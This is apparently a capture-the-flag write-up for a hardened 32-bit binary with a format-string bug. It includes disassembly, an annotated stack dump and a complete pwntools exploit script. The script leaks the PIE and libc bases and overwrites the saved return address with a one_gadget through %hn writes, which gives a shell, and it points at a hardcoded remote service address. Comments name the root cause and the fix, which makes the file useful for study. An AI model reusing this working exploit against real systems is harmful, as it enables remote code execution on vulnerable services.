Arch: i386-32-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled FORTIFY: Enabled
.text:5662B933 sub esp, 8 .text:5662B936 push 18h .text:5662B938 lea eax, (echo - 5662CFB0h)[ebx] ; "" .text:5662B93E push eax .text:5662B93F call read_input .text:5662B944 add esp, 10h .text:5662B947 sub esp, 0Ch .text:5662B94A lea eax, (echo - 5662CFB0h)[ebx] ; "" .text:5662B950 push eax ; format .text:5662B951 call _printf .text:5662B956 add esp, 10h
FFD5F0C0 5664300C .bss:echo FFD5F0C4 00000018 %1$x FFD5F0C8 00000004 FFD5F0CC 566418F3 %3$x, main+6D FFD5F0D0 00000001 FFD5F0D4 FFD5F194 %5$x FFD5F0D8 FFD50A31 FFD5F0DC 36B20200 STACK_COOKIE FFD5F0E0 FFD5F100 %8$x, SAVED_ECX FFD5F0E4 00000000 SAVED_EBX FFD5F0E8 00000000 SAVED_EBP FFD5F0EC F7D75637 %11$x, __libc_start_main+F7 ... FFD5F0FC F7D75637 RET ... FFD5F194 FFD6128A %53$x .text:56630985 lea esp, [ebp-8] .text:56630988 pop ecx .text:56630989 pop ebx .text:5663098A pop ebp .text:5663098B lea esp, [ecx-4] .text:5663098E retn .text:5663098E main endp
from pwn import *

# Exploit driver for the `./format` challenge.  Root cause (see the disassembly
# above): the user-controlled `.bss` buffer `echo` is filled by read_input and
# then passed to printf as the *format* argument (`push eax ; format`), so the
# caller decides which conversions run.  The binary is fully hardened (Full
# RELRO, canary, NX, PIE, FORTIFY) but this call site is plain `_printf`, not
# `__printf_chk`, so the FORTIFY check that rejects `%n` on a writable format
# string does not apply here and the other mitigations only make the exploit
# need a leak first.  The fix is `printf("%s", echo)` / `puts(echo)`, and
# building with `-Wformat -Wformat-security` so the pattern is flagged.

target_file = './format'
context.log_level = 'error'
context.binary = target_file

# Two libc builds are referenced: the one shipped with the challenge for the
# remote service, and the local distro libc for testing.  Every libc-relative
# offset below depends on which one is in use.
if args['REMOTE']:
    libc_path = './libc-2.23.so'
else:
    libc_path = '/lib/i386-linux-gnu/libc.so.6'
libc = ELF(libc_path)


def get_io():
    """Open a tube to the target: remote service, local IDA debug server, or a local process."""
    if args['REMOTE']:
        io = remote('152.136.18.34', 9999)
    elif args['IDA']:
        io = process(['./linux_server'])
    else:
        io = process([target_file])
    return io


def x_input(io, s: str):
    """Pick menu option 1 ("say"), send `s` as the format string, and return the echoed line.

    Whatever `s` contains is interpreted by printf: positional `%N$x` reads
    leak stack words, `%N$hn` stores the number of bytes printed so far (as a
    16-bit value) at the pointer held in argument N.
    """
    io.sendlineafter('Choice:', '1')
    io.sendlineafter('say:', s)
    return io.recvline(keepends=False)


def x_exit(io) -> None:
    """Pick menu option 2, which makes main return through its (by then rewritten) saved return address."""
    io.sendlineafter('Choice:', '2')
    return


def test() -> None:
    """Run the leak-then-write chain over a single connection."""
    io = get_io()

    # Leak three stack words (argument positions from the stack dump above):
    #   %3$x  -> a code address inside main (main+0x6D), giving the PIE base
    #   %8$x  -> SAVED_ECX, which main's epilogue turns back into esp
    #   %11$x -> __libc_start_main+0xF7, giving the libc base
    s = x_input(io, '%3$x,%8$x,%11$x').split(',')
    process_base = int(s[0], 16) - 0x8F3  # 0x8F3 = (main+0x6D) - image base
    saved_ecx = int(s[1], 16)
    # main ends with `lea esp, [ecx-4]; retn`, so the return address it pops
    # lives at saved_ecx - 4.
    ret_stack_addr = saved_ecx - 4
    libc_base = int(s[2], 16) - (libc.symbols['__libc_start_main'] + 0xF7)
    print('process_base: %x' % process_base)
    print('ret_stack_addr: %x' % ret_stack_addr)
    print('lib_base: %x' % libc_base)

    # one_gadget offset for the libc build in use; these values are specific
    # to the exact builds named above and are taken from the writeup as-is.
    if args['REMOTE']:
        one_gadget = libc_base + 0x5f065
    else:
        one_gadget = libc_base + 0x5fbc5

    # Rewrite the saved return address two bytes at a time with `%<n>c%<k>$hn`
    # (print n characters, then store the 16-bit output count through
    # argument k).  Argument 5 holds a pointer to the stack slot that
    # argument 53 is read from (FFD5F0D4 -> FFD5F194 in the dump), so a write
    # through %5$hn re-aims %53$hn.  Only the low half-word of that pointer is
    # changed, which works because the RET slot (FFD5F0FC) and FFD5F194 share
    # their upper 16 bits.
    x_input(io, '%%%dc%%%d$hn' % (ret_stack_addr & 0xFFFF, 5))        # %5 target -> &ret (low half)
    x_input(io, '%%%dc%%%d$hn' % (one_gadget & 0xFFFF, 53))           # *(&ret)   := gadget low half
    x_input(io, '%%%dc%%%d$hn' % ((ret_stack_addr + 2) & 0xFFFF, 5))  # %5 target -> &ret + 2
    x_input(io, '%%%dc%%%d$hn' % (one_gadget >> 16, 53))              # *(&ret+2) := gadget high half
    x_exit(io)
    io.interactive()
    return


# Runs on import; wrap in `if __name__ == '__main__':` if this module is reused.
test()